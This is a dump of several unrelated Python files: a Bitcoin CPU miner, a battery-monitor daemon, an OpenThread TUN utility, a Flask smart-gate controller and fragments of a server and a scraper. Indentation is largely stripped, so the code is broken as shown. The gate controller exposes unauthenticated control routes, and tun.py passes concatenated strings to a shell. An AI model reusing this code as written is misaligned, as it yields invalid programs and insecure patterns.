if not self.connectedMachines.has_key( machineId ):
self.connectedMachines[ machineId ] = singleMachine
self.UpdateMachines() #update all the users with the new machine status
else: #the old singleMachine was still preserved since there were some users in it still
WriteToFile("\n* The machine "+str(machineId)+" already exists so trying to close the connection with the previous one")
self.connectedMachines[ machineId ].Stop(False) # this is a preventative measure just in case it was a zombie
del self.connectedMachines[ machineId ] #delete the old one and save the new one
self.connectedMachines[ machineId ] = singleMachine
self.UpdateMachines()
self.connectedMachinesLock.release()
# updates all the users with the new machine status (based on self.connectedMachines)
def UpdateMachines(self):
self.connectedUsersLock.acquire()
statusList = self.MakeMachinesStatusList()
newStatusList = self.MakeNewMachinesStatusList()
for singleUser in self.connectedUsers:
if singleUser.IsNewStyle(): # ui 2.82 and above gets the systemip/port info as well
singleUser.SendMachinesStatusMessage(newStatusList)
else:
singleUser.SendMachinesStatusMessage(statusList)
self.connectedUsersLock.release()
# removes the machine keyed by its machineId
def UnregisterMachine(self, machineId):
self.connectedMachinesLock.acquire()
if self.connectedMachines.has_key( machineId ):
if self.IsRoomEmpty( machineId ): #if the room was determined to be empty, close it
del self.connectedMachines[machineId]
self.UpdateMachines()
self.connectedMachinesLock.release()
# check if there are any users still left in this room,
# if there are, return FALSE, otherwise return TRUE
def IsRoomEmpty(self, machineId):
roomEmpty = True
self.registeredUsersLock.acquire()
registeredUsers = self.registeredUsers.copy()
self.registeredUsersLock.release()
for singleUser in registeredUsers.values():
if machineId in singleUser.GetMachines():
roomEmpty = False
break # there is at least one user still left in the room, so leave it open
return roomEmpty
# it makes the list of currently connected machines
def MakeMachinesStatusList(self):
statusList = [] #make the status list consisting of [name,ip,port,id,alive], [name,ip,port,id,alive], ....
keys = self.connectedMachines.keys()
keys.sort()
for machineId in keys:
tempList = []
singleMachine = self.connectedMachines[machineId]
tempList.append( singleMachine.GetName() )
tempList.append( singleMachine.GetIP() )
tempList.append( singleMachine.GetPort() )
tempList.append( machineId )
tempList.append( int(singleMachine.IsAlive()) )
tempList.append( singleMachine.GetDisplayInfo() )
statusList.append(tempList)
return statusList
# this is for new style UIs that accept system ip/port
# as well
def MakeNewMachinesStatusList(self):
statusList = []
keys = self.connectedMachines.keys()
keys.sort()
for machineId in keys:
tempList = []
singleMachine = self.connectedMachines[machineId]
tempList.append( singleMachine.GetName() )
tempList.append( singleMachine.GetIP() )
tempList.append( singleMachine.GetPort() )
tempList.append( machineId )
tempList.append( int(singleMachine.IsAlive()) )
tempList.append( singleMachine.GetDisplayInfo() )
tempList.append( singleMachine.GetSystemIP()+" "+str(singleMachine.GetSystemPort()))
statusList.append(tempList)
return statusList
#-----------------------------------------------------------------------------------------------
class XMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
allow_reuse_address = True
def __init__(self, addr):
SimpleXMLRPCServer.SimpleXMLRPCServer.__init__(self, addr, logRequests=False)
self.socket.settimeout(2) # so that handle_request times out and we can check all appLaunchers
def main( argv ):
global USER_SERVER_PORT
global SAGE_SERVER_PORT
global PRINT_TO_SCREEN
WriteToFile("\n\n\n#####################################################################\n")
WriteToFile(" SAGE Server HAS BEEN RESTARTED\t<" + time.asctime() + ">")
WriteToFile("\n#####################################################################\n\n\n")
WriteStats("\n\nSERVER RESTARTED\t"+str(time.asctime())+"\n\n")
# get the arguments (port)
if len(argv) == 3:
if "-v" in argv:
PRINT_TO_SCREEN = True
else:
print "Usage: python UsersServer.py [USER_SERVER_PORT] [SAGE_SERVER_PORT]\n"
sys.exit(0)
elif len(argv) > 3:
USER_SERVER_PORT = int(argv[2])
SAGE_SERVER_PORT = int(argv[3])
if "-v" in argv:
PRINT_TO_SCREEN = True
# start the server accepting connections at the specified port
server = Server()
if __name__ == '__main__':
main( ['', os.path.basename( sys.argv[0] )] + sys.argv[1:] )
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8432
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
gavin_bms.py
|
#!/usr/local/bin/python3.6 -u
# Daemon to read values from the voltage and current sensors
# Data is requested through a json string, and returned as a json string
import os.path
from os import unlink
#from datetime import date
import json
import socket
from threading import Thread
from time import sleep
id = 'Gavin BMS Daemon'
version = '1.1.3'
DEBUG = 0
try:
import Adafruit_ADS1x15
DEV_MODE = 0
except ImportError:
    print("ADS1x15 ADC not found, entering offline dev mode.")
DEV_MODE = 1
if DEV_MODE != 1:
    # Configure ADS1x15 parameters
adc = Adafruit_ADS1x15.ADS1115(address=0x48, busnum=1)
adc_GAIN = 2/3
adc_SPS = 128
adc_VOFFSET = [5.545, 5]
adc_ACS770_OFFSET = 40
voltage_value = []
sensor_data_map = {}
# setup config map
config_map = {}
battery_map = {}
# Config file location
config_map['config_dir'] = "/opt/gavin/etc"
config_map['config_file'] = "config.json"
battery_map['config_file'] = "battery_config.json"
battery_map['initial_ert'] = 65535
battery_map['epoch_counter'] = 0
# Default config values
config_map['motor_watts'] = 500 # Gavin motor per Tahoe Benchmark
config_map['adc_offset'] = .1875
config_map['acs7xx_scaling'] = 0
config_map['acs7xx_error'] = -120
# Default battery values
# battery config file created or added to when batteries are configured (new batteries)
# battery logs reference battery config file via UUID
battery_map['uuid'] = "2135"
battery_map['mfg'] = ""
battery_map['model'] = ""
battery_map['weight'] = 0
battery_map['modules'] = 2
battery_map['chemistry'] = "SLA"
battery_map['voltage'] = 12
battery_map['amphr'] = 35
battery_map['min_voltage'] = 10
battery_map['max_voltage'] = 13.1
sensor_data_map['ert'] = 0
# Server values
serversocket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
serversocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
socket_file = "/tmp/gavin_bms.socket"
try:
os.unlink(socket_file)
except OSError:
if os.path.exists(socket_file):
raise
# Function to read or reread config file
def read_config():
if os.path.isfile('%s/%s' % (config_map['config_dir'], config_map['config_file'])):
with open('%s/%s' % (config_map['config_dir'], config_map['config_file']), 'r') as configfile:
try:
config = json.load(configfile)
if 'motor' in config:
if 'watts' in config['motor']:
config_map['motor_watts'] = int(config['motor']['watts'])
if 'adc' in config:
if 'offset' in config['adc']:
config_map['adc_offset'] = float(config['adc']['offset'])
if 'ACS7xx' in config:
if 'scaling' in config['ACS7xx']:
config_map['acs7xx_scaling'] = int(config['ACS7xx']['scaling'])
if 'error' in config['ACS7xx']:
config_map['acs7xx_error'] = int(config['ACS7xx']['error'])
except ValueError:
print("Corrupt config file, loading defaults.")
else:
print("Config file not found, loading defaults.")
# Function to read/reread battery setup data
def read_battery_config():
if os.path.isfile('%s/%s' % (config_map['config_dir'], battery_map['config_file'])):
with open('%s/%s' % (config_map['config_dir'], battery_map['config_file']), 'r') as battery_config:
try:
battery_specs = json.load(battery_config)
battery_specs = max(battery_specs.items(), key=lambda i: i[1]['installed'])
battery_map['uuid'] = battery_specs[1]['uuid']
if "battery-" + battery_map['uuid'] in battery_specs:
if 'installed' in battery_specs[1]:
battery_map['installed'] = battery_specs[1]['installed']
if 'mfg' in battery_specs[1]:
battery_map['mfg'] = battery_specs[1]['mfg']
if 'model' in battery_specs[1]:
battery_map['model'] = battery_specs[1]['model']
if 'weight' in battery_specs[1]:
battery_map['weight'] = battery_specs[1]['weight']
if 'modules' in battery_specs[1]:
battery_map['modules'] = int(battery_specs[1]['modules'])
if 'chemistry' in battery_specs[1]:
battery_map['chemistry'] = battery_specs[1]['chemistry']
if 'voltage' in battery_specs[1]:
battery_map['voltage'] = float(battery_specs[1]['voltage'])
if 'ampHr' in battery_specs[1]:
battery_map['amphr'] = int(battery_specs[1]['ampHr'])
if 'min_voltage' in battery_specs[1]:
battery_map['min_voltage'] = float(battery_specs[1]['min_voltage'])
if 'max_voltage' in battery_specs[1]:
battery_map['max_voltage'] = float(battery_specs[1]['max_voltage'])
except ValueError:
print("Corrupt battery config file, loading defaults.")
else:
print("Battery config file not found, loading defaults.")
def read_sensors():
if DEV_MODE != 1:
if config_map['acs7xx_scaling'] == 1:
adc_current_reference_voltage = float("{0:.4f}".format((sensor_data_map['adc_current_reference'] * config_map['adc_offset'] * .001)))
adc_offset_percent = adc_current_reference_voltage / 5.0
adc_ACS770_OFFSET_adjusted = adc_ACS770_OFFSET / 1000 * adc_offset_percent
else:
adc_ACS770_OFFSET_adjusted = adc_ACS770_OFFSET
sensor_data_map['current_actual_raw'] = float("{0:.4f}".format(((sensor_data_map['adc_current_value'] - (sensor_data_map['adc_current_reference'] / 2) - config_map['acs7xx_error']) * config_map['adc_offset']) / adc_ACS770_OFFSET_adjusted))
if -.005 <= sensor_data_map['current_actual_raw'] <= .05:
sensor_data_map['current_actual'] = 0
else:
sensor_data_map['current_actual'] = sensor_data_map['current_actual_raw']
for battery_module in range(0, battery_map['modules']):
voltage_value[battery_module] = float("{0:.2f}".format(((adc.read_adc(battery_module + 1, gain=adc_GAIN, data_rate=adc_SPS) * config_map['adc_offset']) * adc_VOFFSET[battery_module]) * .001))
for battery_module in range(0, battery_map['modules']):
if battery_module < battery_map['modules'] - 1:
voltage_value[battery_module] = float("{0:.2f}".format(voltage_value[battery_module] - voltage_value[battery_module + 1]))
if sensor_data_map['current_actual_raw'] > .5:
sensor_data_map['state'] = 'on trigger'
elif .05 <= sensor_data_map['current_actual_raw'] <= .5:
sensor_data_map['state'] = 'discharging'
elif -.350 <= sensor_data_map['current_actual_raw'] < -.005 and all(13.5 <= v <= 14.3 for v in voltage_value):
sensor_data_map['state'] = 'maintaining'
elif sensor_data_map['current_actual_raw'] < -.350:
sensor_data_map['state'] = 'charging'
else:
sensor_data_map['state'] = 'resting'
else:
voltage_value[0] = 12.33
voltage_value[1] = 12.29
sensor_data_map['adc_current_value'] = 13989
sensor_data_map['adc_current_reference'] = 27189
sensor_data_map['current_actual'] = 16
sensor_data_map['state'] = 'discharging'
sensor_data_map['vbatt_actual'] = float("{0:.2f}".format(sum(voltage_value)))
sensor_data_map['watts_actual'] = float("{0:.2f}".format(sensor_data_map['current_actual'] * sensor_data_map['vbatt_actual']))
if sensor_data_map['current_max'] < sensor_data_map['current_actual']:
sensor_data_map['current_max'] = sensor_data_map['current_actual']
if sensor_data_map['adc_current_min'] > sensor_data_map['adc_current_value']:
sensor_data_map['adc_current_min'] = sensor_data_map['adc_current_value']
if sensor_data_map['adc_current_max'] < sensor_data_map['adc_current_value']:
sensor_data_map['adc_current_max'] = sensor_data_map['adc_current_value']
def runtime_calculator():
# Simple runtime estimate based on ideal battery, and SoC, needs to be cleaned up later
# ERT in minutes
# SoC based on open circuit voltage. min_voltage also valid for load
# Need to add coulomb counter value for better percentage estimate
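# Rough worked example of the SoC interpolation below, assuming the default
# battery values in this file (2 modules, 10.0 V min and 13.1 V max per module):
#   pack min = 20.0 V, pack max = 26.2 V, measured vbatt_actual = 24.6 V
#   battery_percent = (24.6 - 20.0) * 100 / (26.2 - 20.0) ≈ 74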
if battery_map['chemistry'] == 'SLA':
if sensor_data_map['vbatt_actual'] <= (battery_map['min_voltage'] * battery_map['modules']):
sensor_data_map['battery_percent'] = 0
elif sensor_data_map['vbatt_actual'] >= (battery_map['max_voltage'] * battery_map['modules']):
sensor_data_map['battery_percent'] = 100
else:
sensor_data_map['battery_percent'] = float("{0:.0f}".format((sensor_data_map['vbatt_actual'] - (battery_map['min_voltage'] * battery_map['modules'])) * 100 / ((battery_map['max_voltage'] * battery_map['modules']) - (battery_map['min_voltage'] * battery_map['modules']))))
# Initial ERT when current is detected
if battery_map['initial_ert'] == 65535 and (sensor_data_map['watts_actual'] / 2) > 0:
battery_map['initial_ert'] = int((battery_map['amphr'] * 10) / (sensor_data_map['watts_actual'] / 2) * 60)
#if battery_map['chemistry'] == 'SLA':
#battery_map['initial_ert'] = int(battery_map['initial_ert'] * .6)
sensor_data_map['ert'] = battery_map['initial_ert']
if DEBUG == 1:
print('ERT calc, no initial ert and current above 0: %d' % (sensor_data_map['ert']))
# Initial ERT calc based on battery amphr rating and max motor wattage. Assumes open circuit voltage
elif battery_map['initial_ert'] == 65535 and sensor_data_map['watts_actual'] == 0:
sensor_data_map['ert'] = int((battery_map['amphr'] * 10) / (config_map['motor_watts'] / 2) * 60 * (sensor_data_map['battery_percent'] / 100))
#if battery_map['chemistry'] == 'SLA':
#ert = ert * .6
if DEBUG == 1:
print('ERT Calc, no initial ert and no current: %d' % (sensor_data_map['ert']))
# Update running ERT
elif battery_map['initial_ert'] != 65535 and (sensor_data_map['watts_actual'] / 2) > 0:
sensor_data_map['ert'] = int(((battery_map['amphr'] - sensor_data_map['current_total']) * 10) / (sensor_data_map['watts_actual'] / 2) * 60)
if DEBUG == 1:
print('ERT calc, initial ert set and current above 0: %d' % (sensor_data_map['ert']))
def coulomb_counter():
startup = 1
avg_counter = 0
avg_current = 0
avg_ref = 0
avg_loop = 10
sensor_data_map['current_total'] = 0
sensor_data_map['current_max'] = 0
sensor_data_map['adc_current_min'] = 13833
sensor_data_map['adc_current_max'] = 13111
while True:
avg_current += adc.read_adc(3, gain=adc_GAIN, data_rate=adc_SPS)
avg_ref += adc.read_adc(0, gain=adc_GAIN, data_rate=adc_SPS)
if avg_counter == avg_loop and startup == 0:
sensor_data_map['adc_current_value'] = int(round(avg_current / avg_loop))
sensor_data_map['adc_current_reference'] = int(round(avg_ref / avg_loop))
read_sensors()
if DEBUG == 1:
print('adc value: %d supply value: %d' % (sensor_data_map['adc_current_value'], sensor_data_map['adc_current_reference']))
if sensor_data_map['state'] == 'charging' or sensor_data_map['state'] == 'discharging':
sensor_data_map['current_total'] += (sensor_data_map['current_actual'] / 3600)
sensor_data_map['watts_total'] = sensor_data_map['current_total'] * sensor_data_map['vbatt_actual']
if DEBUG == 1:
print('Current: %f, current total: %f' % (sensor_data_map['current_actual_raw'], sensor_data_map['current_total']))
runtime_calculator()
avg_counter = 0
avg_current = 0
avg_ref = 0
elif avg_counter == avg_loop and startup == 1:
avg_counter = 0
avg_current = 0
avg_ref = 0
startup = 0
avg_counter += 1
sleep(1/avg_loop)
# Get values from config file
read_config()
read_battery_config()
for i in range(0, battery_map['modules']):
voltage_value.append(0)
# Setup socket and 2 listeners
serversocket.bind(socket_file)
serversocket.listen(2)
coulomb_counter_thread = Thread(target = coulomb_counter)
coulomb_counter_thread.start()
print(id, version, "listening on", socket_file)
# Main loop
while True:
msg = ''
clientsocket, addr = serversocket.accept()
if DEV_MODE == 1:
print("Got a connection")
incomming = clientsocket.recv(32).decode()
try:
request = json.loads(incomming)
except:
msg = 'Commands must be in correct JSON format\n'
request = ''
if 'request' in request:
if request['request'] == 'data':
if DEBUG == 1:
print('adc current min: %d adc current max: %d' % (sensor_data_map['adc_current_min'], sensor_data_map['adc_current_max']))
battery_data = '{"voltage": %s, "current": %s, "current total": %s, "current max": %s, "watts": %s, "ert": %s, "percent": %s, "state": "%s",' % (str(sensor_data_map['vbatt_actual']), str(sensor_data_map['current_actual']), str(sensor_data_map['current_total']), str(sensor_data_map['current_max']), str(sensor_data_map['watts_actual']), str(sensor_data_map['ert']), str(sensor_data_map['battery_percent']), sensor_data_map['state'])
for i in range(0, battery_map['modules']):
battery_data = '%s "v%s": %s, ' % (battery_data, str(i + 1), str(voltage_value[i]))
battery_data = '%s "uuid": "%s"}' % (battery_data, battery_map['uuid'])
msg = json.dumps(json.loads(battery_data), indent = 4, sort_keys = True, separators=(',', ': '))
elif request['request'] == 'reload':
read_config()
read_battery_config()
for i in range(0, battery_map['modules']):
voltage_value.append(0)
msg = json.dumps({'reload': 'complete'}, indent = 4, sort_keys = True, separators=(',', ': '))
elif request['request'] == 'shutdown':
msg = json.dumps({'shutdown': 'complete'}, indent = 4, sort_keys = True, separators=(',', ': '))
break
elif request['request'] == 'version':
msg = json.dumps({'Name': id, 'Version': version}, indent = 4, sort_keys = True, separators=(',', ': '))
elif request['request'] == 'battery info':
msg = json.dumps({'uuid': battery_map['uuid'], 'installed': battery_map['installed'], 'mfg': battery_map['mfg'], 'model': battery_map['model'], 'amphr': battery_map['amphr'], 'chemistry': battery_map['chemistry'], 'voltage': battery_map['voltage'], 'minimum voltage': battery_map['min_voltage'], 'maximum voltage': battery_map['max_voltage'], 'weight': battery_map['weight'], 'modules': battery_map['modules']}, indent = 4, sort_keys = True, separators=(',', ': '))
else:
msg = json.dumps({'request': 'unknown'}, indent = 4, sort_keys = True, separators=(',', ': '))
else:
if request != '':
msg = json.dumps({'request': 'unknown'}, indent = 4, sort_keys = True, separators=(',', ': '))
try:
clientsocket.send(msg.encode('ascii'))
except socket.error:
pass
clientsocket.close()
clientsocket.send(msg.encode('ascii'))
clientsocket.close()
print(id, "exiting")
|
tun.py
|
#
# Copyright (c) 2016-2017, The OpenThread Authors.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Utility class for creating TUN network interfaces on Linux and OSX. """
from __future__ import print_function
import os
import sys
import struct
import logging
import threading
import traceback
import subprocess
if sys.platform == "linux" or sys.platform == "linux2":
import fcntl
from select import select
import spinel.util as util
import spinel.config as CONFIG
IFF_TUN = 0x0001
IFF_TAP = 0x0002
IFF_NO_PI = 0x1000
IFF_TUNSETIFF = 0x400454ca
IFF_TUNSETOWNER = IFF_TUNSETIFF + 2
class TunInterface(object):
""" Utility class for creating a TUN network interface. """
def __init__(self, identifier):
self.identifier = identifier
self.ifname = "tun" + str(self.identifier)
self.tun = None
self.fd = None
platform = sys.platform
if platform == "linux" or platform == "linux2":
self.__init_linux()
elif platform == "darwin":
self.__init_osx()
else:
raise RuntimeError("Platform \"{}\" is not supported.".format(platform))
self.ifconfig("up")
#self.ifconfig("inet6 add fd00::1/64")
self.__start_tun_thread()
def __init_osx(self):
logging.info("TUN: Starting osx " + self.ifname)
filename = "/dev/" + self.ifname
self.tun = os.open(filename, os.O_RDWR)
self.fd = self.tun
# trick osx to auto-assign a link local address
self.addr_add("fe80::1")
self.addr_del("fe80::1")
def __init_linux(self):
logging.info("TUN: Starting linux " + self.ifname)
self.tun = open("/dev/net/tun", "r+b")
self.fd = self.tun.fileno()
ifr = struct.pack("16sH", self.ifname, IFF_TUN | IFF_NO_PI)
fcntl.ioctl(self.tun, IFF_TUNSETIFF, ifr) # Name interface tun#
fcntl.ioctl(self.tun, IFF_TUNSETOWNER, 1000) # Allow non-sudo access
def close(self):
""" Close this tunnel interface. """
if self.tun:
os.close(self.fd)
self.fd = None
self.tun = None
@classmethod
def command(cls, cmd):
""" Utility to make a system call. """
subprocess.check_call(cmd, shell=True)
def ifconfig(self, args):
""" Bring interface up and/or assign addresses. """
self.command('ifconfig ' + self.ifname + ' ' + args)
def ping6(self, args):
""" Ping an address. """
cmd = 'ping6 ' + args
print(cmd)
self.command(cmd)
def addr_add(self, addr):
""" Add the given IPv6 address to the tunnel interface. """
self.ifconfig('inet6 add ' + addr)
def addr_del(self, addr):
""" Delete the given IPv6 address from the tunnel interface. """
platform = sys.platform
if platform == "linux" or platform == "linux2":
self.ifconfig('inet6 del ' + addr)
elif platform == "darwin":
self.ifconfig('inet6 delete ' + addr)
def write(self, packet):
#global gWpanApi
#gWpanApi.ip_send(packet)
# os.write(self.fd, packet) # Loop back
if CONFIG.DEBUG_TUN:
logging.debug("\nTUN: TX (" + str(len(packet)) +
") " + util.hexify_str(packet))
def __run_tun_thread(self):
while self.fd:
try:
ready_fd = select([self.fd], [], [])[0][0]
if ready_fd == self.fd:
packet = os.read(self.fd, 4000)
if CONFIG.DEBUG_TUN:
logging.debug("\nTUN: RX (" + str(len(packet)) + ") " +
util.hexify_str(packet))
self.write(packet)
except:
traceback.print_exc()
break
logging.info("TUN: exiting")
if self.fd:
os.close(self.fd)
self.fd = None
def __start_tun_thread(self):
"""Start reader thread"""
self._reader_alive = True
self.receiver_thread = threading.Thread(target=self.__run_tun_thread)
self.receiver_thread.setDaemon(True)
self.receiver_thread.start()
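# Example usage (a sketch; requires root privileges and the spinel package
# imported above — the identifier and address are illustrative):
#   tun = TunInterface(1)      # creates and brings up interface "tun1"
#   tun.addr_add("fd00::2")    # assign an IPv6 address via ifconfig
#   tun.close()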
|
controller.py
|
'''
Description: Access control (smart gate) module
Author: Shengxiang Hu
Github: https://github.com/MTleen
Date: 2021-02-07 23:12:03
LastEditors: Shengxiang Hu
LastEditTime: 2021-03-18 19:48:39
FilePath: /smart_gate_v2/controller.py
'''
from flask import Flask
from flask import request
import os
from numpy.lib.histograms import histogram
import requests
import yaml
import json
import argparse
from threading import Timer, Thread
import logging
from easydict import EasyDict as edict
import time
from redis import StrictRedis
from man_utils.parser import get_config
from man_utils.log import get_logger
from detect import check_accesstoken, heartbeat, parse_args, start_detect
app = Flask(__name__)
os.chdir(os.path.dirname(os.path.abspath(__file__)))
logger = get_logger('gunicorn')
try:
redis = StrictRedis('127.0.0.1', port=6379, db=1)
except Exception:
logger.error('redis database connection error!')
@app.route('/set_mode')
def set_mode():
mode = request.args.get('mode')
# cfg.sys.mode = int(mode)
redis.set('mode', mode)
logger.info(f'***************** set mode:{mode} *****************')
return 'ok'
@app.route('/get_detect_states')
def get_states():
return redis.get('detect_status').decode()
@app.route('/get_whitelist')
def get_white_list():
logger.info('***************** get whitelist *****************')
return json.dumps(list(
map(lambda x: x.decode(), redis.lrange('white_list', 0, -1))),
ensure_ascii=False)
@app.route('/get_mode')
def get_mode():
logger.info('***************** get_mode *****************')
return {'1': '自动模式', '0': '手动模式'}[redis.get('mode').decode()]
@app.route('/send_command')
def send_command():
command = request.args.get('operation')
logger.info(f'***************** send command: {command} *****************')
url = redis.get('manual_command_url').decode()
print(command)
res = requests.get(url, params={'operation': command})
if res.status_code == 200:
return 'ok'
else:
return 'error'
@app.route('/get_history')
def get_history():
logger.info('***************** get history *****************')
date = time.strftime('%Y-%m-%d', time.localtime())
if redis:
try:
raw_history = redis.lrange(date, 0, -1)
history = list(map(lambda x: x.decode(), raw_history))
return json.dumps(history, ensure_ascii=False)
except Exception:
logger.error('redis operation failed!')
return 'error'
else:
return 'error'
def start_server():
try:
while 1:
app.run(host='0.0.0.0',
ssl_context=('./server/server.pem', './server/server.key'))
except Exception:
logger.error('Server error, restarting the server!')
start_server()
if __name__ == '__main__':
# os.chdir(os.path.dirname(os.path.abspath(__file__)))
# # Start the server
# Thread(target=start_server, name='flask_server').start()
# args = parse_args()
# cfg = get_config()
# cfg.merge_from_file(args.config_deepsort)
# cfg.merge_from_file(args.config_classes)
# cfg.merge_from_file(args.config_sys)
# cfg.merge_from_file(args.config_license)
# logger = get_logger()
# check_accesstoken(cfg, args)
# hbt = Thread(target=heartbeat)
# hbt.setDaemon(True)
# hbt.start()
# try:
# redis = StrictRedis('127.0.0.1', port=6379, db=1)
# start_detect(cfg, args, redis)
# except Exception:
# logging.error('redis 数据库连接错误!')
...
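# Example requests against the routes above (a sketch; Flask's default port 5000,
# the -k flag for the self-signed certificate, and the operation value are assumptions):
#   curl -k "https://localhost:5000/get_mode"
#   curl -k "https://localhost:5000/set_mode?mode=1"
#   curl -k "https://localhost:5000/send_command?operation=open"
#   curl -k "https://localhost:5000/get_history"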
|
DUrlConsumer.py
|
#! /usr/bin/python
import traceback
from datetime import datetime
import gevent
from gevent import monkey
from common.DBHandler import MySQL
from common.DBHandler import Redis
from common.IOHandler import FileIO
from common.IOHandler import NetworkIO
monkey.patch_all()
def getAllInfo(dbkey):
urlPool = Redis().listUrls(dbkey, 1)
# urlPool = ['http://club.xywy.com/familyDoctor/pay/86054846', 'http://club.xywy.com/familyDoctor/pay/43983196',
# 'http://club.xywy.com/familyDoctor/pay/28476935']
while 1:
if len(urlPool) > 0:
for url in urlPool:
getInfo(url)
getInfo2(url + '?info=1&page=1#name2')
getInfo3(url + '?info=1&page=1#name2')
getInfo4(url + '?info=2&page=1#name3')
urlPool = Redis().listUrls(dbkey, 1)
else:
break
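# URL variants fetched for each doctor page (per the calls in getAllInfo above):
#   <url>                       -> getInfo  : doctor profile page
#   <url>?info=1&page=1#name2   -> getInfo2 : review summary / getInfo3 : review texts
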